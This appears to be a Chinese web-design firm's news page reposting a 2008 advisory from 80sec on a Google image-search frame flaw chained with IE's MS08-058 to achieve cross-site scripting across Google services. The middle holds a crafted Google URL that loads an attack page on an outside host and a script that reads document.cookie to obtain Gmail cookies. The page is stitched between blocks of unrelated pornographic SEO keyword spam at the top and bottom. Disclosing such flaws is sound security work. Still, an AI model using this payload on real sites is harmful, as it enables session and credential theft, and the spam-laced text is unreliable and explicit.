国产一区二区白浆,国产真人作爱免费视频道歉,成人精品久久免费,啪啪啪动态图在线,成人亚洲91,边做饭边被躁bd苍井空图片 ,久久久国产精品成人一区二区三区,97自拍小视频
                深一集團40%的客戶來自外地,80%的業務來自搜索引擎和良好口碑!
                微信 微信人工客服  |
                微信人工客服
                QQ在線溝通

                新聞中心

                全國業務咨詢請致電

                0755-27612861

                為您打響品牌第一炮
                • 在線QQ
                • 在線客服
                • 在線留言
                跨站腳本漏洞,利用MS08-058攻擊Google
                發布日期:2008-10-22   關鍵詞:觀蘭網站建設★觀蘭網頁設計◆觀瀾網站制作   已有 8501 人瀏覽
                國內安全組織80sec近日發現,Google提供的圖片搜索服務存在安全問題,結合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞,幾乎可以控制所有的Google服務和獲得目標用戶的認證信息。

                漏洞說明:Google是全球最大的搜索引擎。同時Google擁有其他龐大的WEB應用程序產品線,涉及EMAIL、BLOG、在線文檔、個人主頁、電子地圖、論壇、RSS等互聯網幾乎所有的應用業務。80sec發現Google提供的圖片搜索服務存在安全問題,結合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞,幾乎可以控制所有的Google服務和獲得目標用戶的認證信息。

                漏洞站點:http://www.google.com

                漏洞解析:Google提供的圖片搜索服務存在網頁框架安全問題,惡意攻擊者可以指定網頁的內嵌框架頁指向任意網頁。該服務提供的URL地址主域名可以更改成Google的其他業務的子域名,從而造成嚴重的釣魚網頁攻擊隱患。如下:黑客指定imgrefurl參數就可能構造GMAIL相關服務的釣魚網頁。

                http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com&hl=com

                該漏洞結合由80SEC團隊成員發現的IE瀏覽器的MS08-058部分漏洞可以造成GOOGLE整站的跨站腳本XSS漏洞,linx在《利用IE 框架跨域》文檔分析了MS08-058涉及網頁框架安全問題,子框架網頁可以操作主框架的窗口句柄。這種類型的漏洞主要危害是不受IE瀏覽器同源策略的限制,可以跨域控制其他域的網頁,影響所有的WEB應用。微軟已經在08年10月提供了MS08-058補丁修復了該漏洞。

                測試代碼:

                將Google的漏洞頁指向MS08-058漏洞攻擊頁

                http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com/MS08-058.htm&hl=com

                MS08-058.htm內容


                <script>
                setTimeout (
                function(){
                parent.location.href = new String("javascript:alert(document.cookie)");
                }
                ,1500);
                </script>

                即可獲得GAMIL的Cookie信息

                危害提醒:

                黑客利用瀏覽器漏洞可以使這種類型的低風險Web安全漏洞擴大成影響所有Web應用的高風險安全問題,請各大網站及安全管理人員仔細分析評估MS08-058類型的Web安全問題。

                注:本文來自深一集團原創或轉截 http://m.fpweiyh.cn/newslist_462_2.html 如需轉載,請注明出處!
                0
                深一網絡公司專注設計14年
                全國網站建設
                深一云服務器深一云服務器
                高性能,高安全
                網絡公司拒絕不當利
                崇尚野蠻生長
                500強企業網500強企業網
                站建設供應商
                10000家客戶案例10000家客戶案
                實力說服力
                83位技術團隊83位技術團隊
                服務高保障
                深一只做有排名網站只做有排名
                有價值的網站
                200人服務團隊200人服務團隊
                追求客戶滿意
                主站蜘蛛池模板: 99热亚洲色精品国产88| 国产最爽的av片在线观看| 国产成人综合亚洲第一区| 男人边吃奶边做好爽视频| 久久久亚洲欧洲日产国码606| 少妇做爰免费视频了| 国产乱码人妻一区二区三区四区 | 内射视频福利在线观看| 精品亚洲国产成人蜜臀av| 麻豆产精品一二三产区区| 国产suv精品一区二区五| 亚洲精品岛国片在线观看| a4yy私人毛片| 色天使色偷偷色噜噜| 国产成人精品亚洲午夜| 中文国产不卡一区二区| 欧美成人怡春院在线激情| 日本熟妇乱人伦xxxx| 国产农村妇女高潮大叫| 久久久久久国产精品美女| 欧美性xxxxx极品少妇直播| 午夜精品一区二区三区成人| 欧美日韩一区二区三区自拍| 亚洲大码熟女在线| 久久精品波多野结衣| 亚洲日本va中文字幕久久| 午夜精品久久久久久久久| 国产不卡网| 亚洲欧美偷国产日韩| 欧美人成精品网站播放| av综合网男人的天堂| 成人毛片无码一区二区| 日韩亚洲国产激情一区二区| 国产精品igao视频网| 亚洲亚洲人成无码网www| 成年无码av片在线蜜芽| 久久中文字幕人妻熟av女蜜柚m | 唐人社视频呦一区二区| 国产国语亲子伦亲子| 精品国产亚洲午夜精品av| 一区二区不卡国产精品|